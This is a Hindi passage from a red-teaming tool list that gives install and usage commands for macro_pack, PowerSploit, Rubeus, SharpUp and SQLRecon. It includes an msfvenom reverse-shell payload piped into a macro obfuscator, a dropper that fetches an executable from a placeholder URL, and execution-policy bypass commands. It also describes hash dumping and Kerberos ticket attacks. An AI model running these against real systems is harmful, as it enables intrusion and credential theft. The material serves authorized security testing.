एक उपकरण जो रेड टीमिंग के लिए Office दस्तावेज़ों, VB स्क्रिप्ट्स, शॉर्टकट और अन्य प्रारूपों के अस्पष्टीकरण और निर्माण को स्वचालित करता है।
**स्थापना: (बाइनरी)**
1. नवीनतम बाइनरी [https://github.com/sevagas/macro_pack/releases/](https://github.com/sevagas/macro_pack/releases/) से प्राप्त करें।
2. वास्तविक Microsoft Office स्थापित पीसी पर बाइनरी डाउनलोड करें।
3. कंसोल खोलें, बाइनरी निर्देशिका पर CD करें और बाइनरी को कॉल करें।
**स्थापना: (Git)**```bash
git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
pip3 install -r requirements.txt
उपयोग:```bash
python3 macro_pack.py --help
macro_pack.exe --listformats
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba
macro_pack.exe -f empire.vba -o -G myDoc.docm
echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm"
echo calc.exe | macro_pack.exe --dde -G calc.xslx

### [🔙](#tool-list)[PowerSploit](https://github.com/PowerShellMafia/PowerSploit)
PowerShell स्क्रिप्ट और मॉड्यूल का एक संग्रह जिसका उपयोग विभिन्न रेड टीमिंग उद्देश्यों को प्राप्त करने के लिए किया जा सकता है।
PowerSploit की कुछ विशेषताएं:
- मेमोरी से पासवर्ड हैश डंप करें और स्पष्ट-पाठ पासवर्ड निकालें
- विशेषाधिकार बढ़ाएं और सुरक्षा नियंत्रणों को बायपास करें
- मनमाना PowerShell कोड निष्पादित करें और निष्पादन प्रतिबंधों को बायपास करें
- नेटवर्क टोही और खोज करें
- पेलोड उत्पन्न करें और एक्सप्लॉइट निष्पादित करें
**इंस्टॉल:** _1. PowerShell मॉड्यूल फ़ोल्डर में सहेजें_
पहले आपको [PowerSploit फ़ोल्डर](https://github.com/PowerShellMafia/PowerSploit) डाउनलोड करना होगा और इसे अपने PowerShell मॉड्यूल फ़ोल्डर में सहेजना होगा।
आपके PowerShell मॉड्यूल फ़ोल्डर का पथ निम्न कमांड से पाया जा सकता है:```
$Env:PSModulePath
Install: 2. PowerSploit को PowerShell मॉड्यूल के रूप में स्थापित करें
फिर आपको PowerSploit मॉड्यूल स्थापित करना होगा (डाउनलोड किए गए फ़ोल्डर का नाम उपयोग करें)।
नोट: आपकी PowerShell निष्पादन नीति आपको ब्लॉक कर सकती है, इसे ठीक करने के लिए निम्नलिखित कमांड चलाएँ।
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force
powershell.exe -ep bypass
अब आप PowerSploit मॉड्यूल स्थापित कर सकते हैं।```
Import-Module PowerSploit
उपयोग:``` Get-Command -Module PowerSploit

### [🔙](#tool-list)[Rubeus](https://github.com/GhostPack/Rubeus)
एक उपकरण जिसका उपयोग Microsoft Active Directory (AD) वातावरण से संबंधित विभिन्न क्रियाएं करने के लिए किया जा सकता है, जैसे पासवर्ड हैश डंप करना, उपयोगकर्ता बनाना/हटाना, और उपयोगकर्ता गुणों को संशोधित करना।
Rubeus की कुछ विशेषताएं:
- केरबेरोस्टिंग
- गोल्डन टिकट आक्रमण
- सिल्वर टिकट आक्रमण
**स्थापना: (डाउनलोड)**
आप अनाधिकृत पूर्व-संकलित Rubeus बाइनरी [यहाँ](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe) स्थापित कर सकते हैं।
**स्थापना: (संकलन)**
Rubeus [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/) के साथ संगत है। rubeus [प्रोजेक्ट .sln](https://github.com/GhostPack/Rubeus) खोलें, "Release" चुनें, और बनाएँ।
**उपयोग:**```
Rubeus.exe -h

पीड़ित एंडपॉइंट की उच्च अखंडता प्रक्रियाओं, समूहों, हाइजैक करने योग्य पथों आदि से संबंधित कमजोरियों की जाँच के लिए एक अच्छा उपकरण।
स्थापित करें: (डाउनलोड)
आप अनाधिकृत पूर्व-संकलित SharpUp बाइनरी को यहाँ स्थापित कर सकते हैं।
स्थापित करें: (संकलन)
SharpUp Visual Studio 2015 Community Edition के साथ संगत है। SharpUp project .sln खोलें, "Release" चुनें, और build करें।
उपयोग:```bash SharpUp.exe audit #-> Runs all vulnerability checks regardless of integrity level or group membership.
SharpUp.exe HijackablePaths #-> Check only if there are modifiable paths in the user's %PATH% variable.
SharpUp.exe audit HijackablePaths #-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.

### [🔙](#tool-list)[SQLRecon](https://github.com/skahwah/SQLRecon)
MS-SQL (Microsoft SQL Server) एक रिलेशनल डेटाबेस प्रबंधन प्रणाली है जिसे Microsoft द्वारा विकसित और विपणन किया गया है।
यह C# MS-SQL टूलकिट आक्रामक टोही और पोस्ट-एक्सप्लॉइटेशन के लिए डिज़ाइन किया गया है। प्रत्येक तकनीक के विस्तृत उपयोग जानकारी के लिए, [wiki](https://github.com/skahwah/SQLRecon/wiki) देखें।
**स्थापित करें: (बाइनरी)**
आप नवीनतम बाइनरी रिलीज़ [यहाँ](https://github.com/skahwah/SQLRecon/releases) से डाउनलोड कर सकते हैं।
**उपयोग:**```bash
# Authenticating using Windows credentials
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami
# Authenticating using Local credentials